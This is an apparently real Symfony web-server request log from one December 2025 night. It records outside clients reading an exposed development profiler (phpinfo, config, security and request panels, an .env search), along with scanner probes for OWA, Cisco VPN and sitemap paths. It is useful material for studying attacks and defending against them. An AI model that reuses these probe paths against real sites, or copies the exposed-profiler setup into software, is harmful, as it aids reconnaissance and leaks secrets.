[2025-12-19 00:11:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:11:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"13da49","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/13da49/search/results?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 00:11:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
[2025-12-19 00:12:30] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 00:13:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=swiftmailer","method":"GET"} []
[2025-12-19 00:13:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 00:14:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 00:16:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:16:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
[2025-12-19 00:16:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 00:19:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:19:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:20:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=security","method":"GET"} []
[2025-12-19 00:20:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 00:20:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=events","method":"GET"} []
[2025-12-19 00:20:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 00:23:17] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6aaa35","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6aaa35/search/results?ip=207.180.196.165&limit=10&url=https%3A%2F%2Fweb.unda.co%2F.env","method":"GET"} []
[2025-12-19 00:23:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&url=https%3A%2F%2Fweb.unda.co%2F.env","method":"GET"} []
[2025-12-19 00:23:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=router","method":"GET"} []
[2025-12-19 00:23:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-19 00:23:51] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"342871","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/342871/router","method":"GET"} []
[2025-12-19 00:26:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5d1a9f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5d1a9f","method":"GET"} []
[2025-12-19 00:26:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 00:28:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=cache","method":"GET"} []
[2025-12-19 00:28:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 00:28:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1bacb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1bacb?panel=time","method":"GET"} []
[2025-12-19 00:28:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 00:28:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
[2025-12-19 00:28:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 00:29:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:32:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=dump","method":"GET"} []
[2025-12-19 00:32:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 00:34:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=request","method":"GET"} []
[2025-12-19 00:34:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 00:35:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=request","method":"GET"} []
[2025-12-19 00:35:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 00:39:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content/uploads"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content/uploads\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:39:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 00:39:39] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"8588e3","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/8588e3","method":"GET"} []
[2025-12-19 00:41:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:41:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:42:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6b3947","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6b3947?panel=events","method":"GET"} []
[2025-12-19 00:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 00:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=security","method":"GET"} []
[2025-12-19 00:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 00:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=twig","method":"GET"} []
[2025-12-19 00:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 00:50:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=request","method":"GET"} []
[2025-12-19 00:50:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 00:56:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=validator","method":"GET"} []
[2025-12-19 00:56:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 00:58:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=config","method":"GET"} []
[2025-12-19 00:58:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 01:03:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7bd251","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7bd251","method":"GET"} []
[2025-12-19 01:03:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 01:06:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=cache","method":"GET"} []
[2025-12-19 01:06:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 01:07:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 01:10:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=security","method":"GET"} []
[2025-12-19 01:10:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 01:14:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f","method":"GET"} []
[2025-12-19 01:14:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 01:15:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 01:17:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24","method":"GET"} []
[2025-12-19 01:17:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 01:17:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=189.172.134.204&limit=10&url=https%3A%2F%2Fapi.unda.co%2Faddress%2Fac5559db-94bf-49bb-b4bf-9d75cd7022a2%2Finvitation%2F10%2F0%3Forder%3Ddesc","method":"GET"} []
[2025-12-19 01:17:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=189.172.134.204&limit=10&url=https%3A%2F%2Fapi.unda.co%2Faddress%2Fac5559db-94bf-49bb-b4bf-9d75cd7022a2%2Finvitation%2F10%2F0%3Forder%3Ddesc","method":"GET"} []
[2025-12-19 01:24:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409","method":"GET"} []
[2025-12-19 01:24:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 01:25:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28","method":"GET"} []
[2025-12-19 01:25:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 01:27:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8dbb7e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8dbb7e?panel=dump","method":"GET"} []
[2025-12-19 01:27:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 01:28:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 01:30:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34983a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/34983a?panel=cache","method":"GET"} []
[2025-12-19 01:30:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 01:35:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 01:35:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=cache","method":"GET"} []
[2025-12-19 01:35:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 01:35:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 01:36:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=logger","method":"GET"} []
[2025-12-19 01:36:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 01:38:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"928956","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/928956?panel=time","method":"GET"} []
[2025-12-19 01:38:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 01:40:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=form","method":"GET"} []
[2025-12-19 01:40:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 01:46:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=config","method":"GET"} []
[2025-12-19 01:46:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
